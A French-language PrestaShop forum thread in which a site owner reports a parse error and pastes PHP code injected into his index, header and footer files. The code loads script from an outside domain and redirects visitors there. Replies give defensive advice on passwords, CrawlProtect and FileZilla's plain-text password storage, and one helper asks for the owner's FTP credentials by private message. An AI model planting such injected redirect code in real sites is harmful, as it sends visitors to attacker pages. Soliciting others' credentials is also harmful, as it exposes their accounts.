Rdev Posted September 2, 2013 Share Posted September 2, 2013 Bonjour, Hier j'ai ce message d'erreur dans la page d'accueil du mon site Parse error: syntax error, unexpected '<' in /xxx/xxx/www.index.php on line 31 et j'ai trouvé ce script dans les fichiers (index.php, header.ph et footer.php) <? #560dc7# if(empty($iemgz)) { $iemgz = "<script type=\"text/javascript\">var gwloaded = false;</script> <script src=\"http://verification.mvpitsolutions.com/lander/Password%20Page_files/gwjs.js\" type=\"text/javascript\"></script> <script type=\"text/javascript\">if (gwloaded==false){window.location = \"http://verification.mvpitsolutions.com/lander/AdBlock%20Must%20be%20Disabled%20to%20View%20This%20Content.html\";}</script> <noscript><meta http-equiv=\"refresh\" content=\"0;url=http://verification.mvpitsolutions.com/lander/JavaScript%20Required.html\" /></noscript>"; echo $iemgz; } #/560dc7# ?> j'ai supprimé les scripts des ses fichiers et le site fonctionne mais je veux savoir comment je peux protéger mon site qui peut m'aider et merci Link to comment Share on other sites More sharing options...
Superbegood31 Posted September 2, 2013 Share Posted September 2, 2013 Bonjour, Commencez par changer le mot de passe FTP (j'imagine que vous utilisez FileZilla...) Pour bétonner, faites de même avec PhpMyAdmin. Ensuite, vous pouvez verrouiller votre PS avec Crawlprotect 1 Link to comment Share on other sites More sharing options...
coeos.pro Posted September 2, 2013 Share Posted September 2, 2013 Bonjour, Commencez par changer le mot de passe FTP (j'imagine que vous utilisez FileZilla...) Pour bétonner, faites de même avec PhpMyAdmin. Ensuite, vous pouvez verrouiller votre PS avec Crawlprotect et passez l'antivirus sur votre ordi, c'est comme ça que les mots de passes FTP sont récupérés. Link to comment Share on other sites More sharing options...
Paul MONFILS Posted September 2, 2013 Share Posted September 2, 2013 Ensuite, vous pouvez verrouiller votre PS avec Crawlprotect oui, et j'ajouterai que CrawlProtect étant un script de sécurisation, il y aura des interractions avec votre boutique. Pas de panique c'est normal puisque la sécurité repose notamment sur le fichier .htaccess. Donc ne vous inquiétez pas si Prestashop ne pourra plus générer de nouveau fichier .htaccess après l'installation de CrawlProtect. Pour permettre à Prestashop de générer un nouveau fichier .htaccess ce sera soit via votre client FTP soit via l'espace de gestion de CrawlProtect. Link to comment Share on other sites More sharing options...
Superbegood31 Posted September 2, 2013 Share Posted September 2, 2013 +1 pour coeos.pro & Paul Monfils Link to comment Share on other sites More sharing options...
Rdev Posted September 3, 2013 Author Share Posted September 3, 2013 Ensuite, vous pouvez verrouiller votre PS avec Crawlprotect merci pour votre réponse j'ai installé Crawlprotect, mais j'ai un autre problème, mon adresse ip a été bloqué Link to comment Share on other sites More sharing options...
Superbegood31 Posted September 3, 2013 Share Posted September 3, 2013 Dans la conf de crawlprotect, retirez votre IP des IP à bannir Link to comment Share on other sites More sharing options...
Rdev Posted September 3, 2013 Author Share Posted September 3, 2013 Dans la conf de crawlprotect, retirez votre IP des IP à bannir l'accès FTP est bloqué et je ne peux pas entrer au site Link to comment Share on other sites More sharing options...
Superbegood31 Posted September 3, 2013 Share Posted September 3, 2013 Vous utilisez votre nouveau mot de passe ? Link to comment Share on other sites More sharing options...
Rdev Posted September 3, 2013 Author Share Posted September 3, 2013 Vous utilisez votre nouveau mot de passe ? Où j'utilise le nouveau mot de passe ? Link to comment Share on other sites More sharing options...
Superbegood31 Posted September 3, 2013 Share Posted September 3, 2013 Assurez-vous que les mot de passe soit les même (côté hébergeur et côté client FTP) Link to comment Share on other sites More sharing options...
Rdev Posted September 3, 2013 Author Share Posted September 3, 2013 Oui les mot de passe sont les même Link to comment Share on other sites More sharing options...
Superbegood31 Posted September 3, 2013 Share Posted September 3, 2013 Quel est le message d'erreur lors de la tentative de connexion FTP ? Link to comment Share on other sites More sharing options...
Rdev Posted September 3, 2013 Author Share Posted September 3, 2013 (edited) le message d'erreur lors de la tentative de connexion FTP est Statut : Résolution de l'adresse de moscoodev.com Statut : Connexion à 91.121.55.79:21... Statut : Connexion établie, attente du message d'accueil... Erreur : Impossible d'établir une connexion au serveur Réponse : 421 Timeout - try typing a little faster next time Erreur : Déconnecté du serveur : ECONNABORTED - Connection aborted Edited September 3, 2013 by radhia005 (see edit history) Link to comment Share on other sites More sharing options...
Superbegood31 Posted September 3, 2013 Share Posted September 3, 2013 Utilisez vous FileZilla ? Link to comment Share on other sites More sharing options...
Rdev Posted September 3, 2013 Author Share Posted September 3, 2013 Oui Link to comment Share on other sites More sharing options...
Superbegood31 Posted September 3, 2013 Share Posted September 3, 2013 Essayez avec un autre client FTP (par exemple WINSCP). FileZilla stocke vos mots de passe en clair... Link to comment Share on other sites More sharing options...
Rdev Posted September 3, 2013 Author Share Posted September 3, 2013 J'ai la même chose j'ai ce message d'erreur Résolution du nom d''hôte impossible La connexion a échouée. Link to comment Share on other sites More sharing options...
Superbegood31 Posted September 3, 2013 Share Posted September 3, 2013 Communiquez moi par MP vos identifiants FTP si vous voulez Link to comment Share on other sites More sharing options...
Seo Organique Posted September 3, 2013 Share Posted September 3, 2013 Oui c'est classique de se faire stealer ses mots de passe, filezilla c'est d'ailleurs une passoire en stockage de mot de passe...mais faut pas télécharger n'importe quoi non plus (backdoor etc) Ceci dit au regard des subterfuges utilisés c'est facile de se faire avoir! Bon courage. Link to comment Share on other sites More sharing options...
Oron Posted September 3, 2013 Share Posted September 3, 2013 Bonjour Rhoooo encore sur le dos de filezilla, il stocke en clair que sur votre pc, vous pouvez aussi vous connecter en mode sécurisé avec filezilla. Avant de tout mettre sur le dos de filezilla, sécurisé votre PC que ce soit sopus windows Mac Linux ou autre. Un anti-virus qui contrôle le disque, les e-mails et les sites web que vous visitez, pour garantir ces 3 fonctions faut investir un peu dans un antivirus. Autre point un bon firewall qui vous protège des accès entrant sur votre poste et sortant de vos logiciels. Celui de windows par défaut ne vous protège pas bien. Utilisez aussi un anti malware et faites des analyses en fond de tâche. Et une fois par mois une analyse complète de votre poste mais sans travailler dessus. Faites des mots de passe complexe minimum 8 caractères mélanger chiffre lettre majuscule lettre minuscule symbôle Le dossier d'administration donnez lui un nom qui ne fait pas penser a un dossier d'administration. Dans crawl protect et crawl track les deux se complètent, vous pouvez configurer pour qu'il ne vous bloque pas. Si vous avez une IP fixe vous pouvez la mettre dans les exclusions pour qu'elle ne soit pas bloquer. Pour accéder si votre poste est bloqué aller chez une personne de confiance ou utilisez un portable PC et aller vous connecter où l'ip sera différente de la votre. Vous pouvez aussi accéder directement dans la base de donnée via phpmyadmin et débloquer vos IP Si vous n'avez pas d'accès phpmyadmin (certaines bases chez ovh) vous pouvez installer un programme sur votre poste pour accéder à ma base de donnée. Si vous demandez de l'aide à un prestataire ou autre que vous ne connaissez pas demander li d'abord de s'identifier nom prénom adresse téléphone siret ou N° rcs. s'il refuse de s'identifier fuyez. Link to comment Share on other sites More sharing options...
Superbegood31 Posted September 4, 2013 Share Posted September 4, 2013 Je suis d'accord avec votre analyse mais il est important que les gens sache que FileZilla stocke les mots de passe en clair. Link to comment Share on other sites More sharing options...
Yoya Posted September 5, 2013 Share Posted September 5, 2013 Fillezilla stock les pwds en clair car d'après eux "ça ne sert à rien de les crypter, les décrypteurs étant légion" et "ce n'est pas à eux de sécuriser votre PC Windows mais bien à l'utilisateur de celui ci et aux antivirus". J'utilise Filezilla depuis des années sous Linux et je n'ai jamais rencontré ce problème étant bien protégé Cdlt Pierre 1 Link to comment Share on other sites More sharing options...
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now